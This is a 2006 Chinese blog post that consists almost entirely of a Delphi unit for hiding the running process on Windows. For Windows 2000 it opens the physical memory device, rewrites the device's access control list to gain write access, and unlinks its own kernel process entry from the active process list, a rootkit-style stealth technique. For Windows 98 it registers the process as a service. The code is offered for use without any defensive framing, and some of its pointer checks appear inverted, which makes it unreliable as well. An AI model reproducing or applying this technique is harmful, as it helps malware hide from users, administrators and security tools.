进程隐藏的Delphi代码
unit UnitHideProcess;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;
type
NTSTATUS=Longint;
USHORT =Byte;
PWSTR=PWidechar;
ULONG= Cardinal;
HANDLE=Pointer;
PVOID=Pointer;
PCWSTR=PWidechar;
PULONG=^ULONG ;
HMODULE=THANDLE;
const
STATUS_ACCESS_DENIED = $C0000022 ;
RSP_SIMPLE_SERVICE = $00000001;
RSP_UNREGISTER_SERVICE = $00000000 ;
type
_UNICODE_STRING= record
Length:USHORT ;
MaximumLength: USHORT;
Buffer:PWSTR;
end;
UNICODE_STRING= _UNICODE_STRING;
PUNICODE_STRING =^ _UNICODE_STRING ;
_OBJECT_ATTRIBUTES =record
Length:ULONG ;
RootDirectory:HANDLE;
ObjectName:PUNICODE_STRING;
Attributes:ULONG;
SecurityDescriptor:PVOID;
SecurityQualityOfService:PVOID ;
end;
OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES;
ZWOPENSECTION=function(
SectionHandle:PInteger;
DesiredAccess:ACCESS_MASK;
ObjectAttributes :POBJECT_ATTRIBUTES
): NTSTATUS; stdcall;
RTLINITUNICODESTRING=procedure(
DestinationString:PUNICODE_STRING;
SourceString :PCWSTR
);stdcall;
TMyHideProcess=class
private
OSversion:Longint;
RtlInitUnicodeString:RTLINITUNICODESTRING ;
ZwOpenSection:ZWOPENSECTION;
g_hNtDLL: HMODULE;
g_pMapPhysicalMemory:PVOID;
g_hMPM :THANDLE ;
function InitNTDLL():bool;
procedure CloseNTDLL();
procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
function OpenPhysicalMemory():THANDLE ;
function LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
function GetData(addr:PVOID ):ULONG;
function SetData( addr:PVOID; data:ULONG):bool;
function HideProcess2000():bool;
procedure HideProcess98();
public
constructor Create( theosver:Longint);
destructor Destroy();
procedure DoHideMe();
end;
implementation
constructor TMyHideProcess.Create( theosver:Longint);
begin
OSversion:=theosver;
end;
destructor TMyHideProcess.Destroy();
begin
CloseNTDLL();
end;
procedure TMyHideProcess.DoHideMe();
begin
case (OSversion) of
98:
HideProcess98();
2000:
HideProcess2000();
end;
end;
function TMyHideProcess.InitNTDLL():bool;
var
a:Longint;
begin
g_hNtDLL := 0;
g_pMapPhysicalMemory := nil;
g_hMPM := 0;
g_hNtDLL := LoadLibrary( 'ntdll.dll' );
if (g_hNtDLL=0 ) then
begin
result:= FALSE;
exit;
end;
@RtlInitUnicodeString :=
GetProcAddress( g_hNtDLL, 'RtlInitUnicodeString');
@ZwOpenSection :=
GetProcAddress( g_hNtDLL, 'ZwOpenSection');
result:= TRUE;
end;
procedure TMyHideProcess.CloseNTDLL();
begin
if(g_hNtDLL <>0 ) then
begin
FreeLibrary(g_hNtDLL);
end;
end;
procedure TMyHideProcess.SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
label CleanUp;
var
pDacl,pNewDacl: PACL ;
pSD: PPSECURITY_DESCRIPTOR ;
dwRes : DWORD;
ea:EXPLICIT_ACCESS;
begin
pDacl:=nil;
pNewDacl :=nil;
pSD:=nil;
dwRes:=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
nil,nil,pDacl,nil,pSD);
if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end;
ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance:= NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER';
dwRes:=SetEntriesInAcl(1,@ea,pDacl,pNewDacl) ;
if(dwRes<> ERROR_SUCCESS) then
begin
goto CleanUp;
end;
dwRes:=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, nil,nil,pNewDacl,nil);
if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end;
CleanUp:
if(pSD<>nil) then
LocalFree(Ulong(pSD));
if(pNewDacl<>nil) then
LocalFree(Ulong(pNewDacl));
end;
function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
status: NTSTATUS ;
physmemString:UNICODE_STRING;
attributes:OBJECT_ATTRIBUTES;
begin
RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));
attributes.Length := sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;
status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
if(status = STATUS_ACCESS_DENIED) then
begin
status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
end;
if status=0 then
begin
result:= 0;
exit;
end;
g_pMapPhysicalMemory := MapViewOfFile(
g_hMPM,
4,
0,
$30000,
$1000);
if( g_pMapPhysicalMemory = nil ) then
begin
result:=0;
exit ;
end;
result:= g_hMPM;
end;
//-------------------------对付数组指针---------------------------------
type
TArrayULONG = array [0..0] of ULONG;
PTArrayULONG= ^TArrayULONG;
//----------------------------------------------------------
function TMyHideProcess.LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
var
VAddr,PGDE,PTE,PAddr,tmp:ULONG;
_PGDE:PULONG; begin
VAddr:=ULONG(addr);
PGDE:=PTArrayULONG(BaseAddress)^[VAddr shr 22];
if ((PGDE and 1)<>0) then
begin
tmp:=PGDE and $00000080;
if (tmp<>0) then
begin
PAddr:=(PGDE and $FFC00000)+(VAddr and $003FFFFF);
end
else
begin
PGDE:=ULONG(MapViewOfFile(g_hMPM, 4, 0, PGDE and $fffff000, $1000));
_PGDE:=PULONG(PGDE);
PTE:=PTArrayULONG(_PGDE)^[(VAddr and $003FF000) shr 12];
if ((PTE and 1)<>0) then
begin
PAddr:=(PTE and $FFFFF000)+(VAddr and $00000FFF);
UnmapViewOfFile(PVOID(PGDE));
end
else
begin
result:= 0;
exit;
end;
end;
end
else
begin
result:= 0;
exit;
end;
result:=PVOID(PAddr);
end;
function
TMyHideProcess.GetData(addr:PVOID ):ULONG;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, 4, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:=0;
exit;
end;
ret:=PTArrayULONG(tmp)^[(phys and $FFF) shr 2];
UnmapViewOfFile(tmp);
result:=ret;
end;
function TMyHideProcess.SetData( addr:PVOID; data:ULONG):bool;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:= FALSE;
exit;
end;
PTArrayULONG(tmp)^[(phys and $FFF) shr 2]:=data;
UnmapViewOfFile(tmp);
result:= TRUE;
end;
function TMyHideProcess.HideProcess2000():bool;
var
thread, process ,fw ,bw :ULONG;
begin
if InitNTDLL() then
begin
if (OpenPhysicalMemory()=0) then
begin
result:= FALSE;
exit;
end;
thread:=GetData(PVOID($FFDFF124));
process:=GetData(PVOID(thread+$22c));
fw:=GetData(PVOID(process+$a0));
bw:=GetData(PVOID(process+$a4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
end;
result:= TRUE;
end;
procedure TMyHideProcess.HideProcess98();
type pRegisterService=function (a,b:DWORD):boolean; stdcall;
var
hKernel : HMODULE ;
RegisterService: pRegisterService ;
begin
hKernel := LoadLibrary('kernel32.dll');
if(hKernel>0) then
begin
@RegisterService :=GetProcAddress(hKernel,'RegisterServiceProcess');
RegisterService(GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
FreeLibrary(hKernel);
hKernel :=0;
end;
end;
end.
发表于 @ 2006年03月16日 15:53:00|评论(loading...)|编辑